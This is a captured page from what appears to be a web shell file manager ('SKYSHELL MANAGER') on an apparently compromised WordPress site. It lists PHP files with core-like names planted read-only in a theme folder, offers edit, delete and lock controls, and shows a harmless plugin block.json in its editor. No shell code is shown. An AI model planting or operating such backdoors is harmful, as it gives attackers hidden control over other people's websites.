📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 2, "name": "unapersona/simple-iframe", "version": "1.2.0", "title": "Simple Iframe", "category": "embed", "icon": "admin-site-alt", "description": "Easily insert iframes into the block editor.", "keywords": [ "iframe", "external" ], "attributes": { "iframeSrc": { "type": "string", "source": "text" }, "iframeWidth": { "type": "string", "source": "text" }, "iframeHeight": { "type": "string", "source": "text" }, "allowFullscreen": { "type": "boolean", "source": "text" }, "useLazyload": { "type": "boolean", "source": "text" }, "useImportant": { "type": "boolean", "source": "text" }, "titleAttr": { "type": "string", "source": "text" } }, "supports": { "html": false }, "textdomain": "simple-iframe", "editorScript": "file:./index.js", "editorStyle": "file:./index.css" }
Save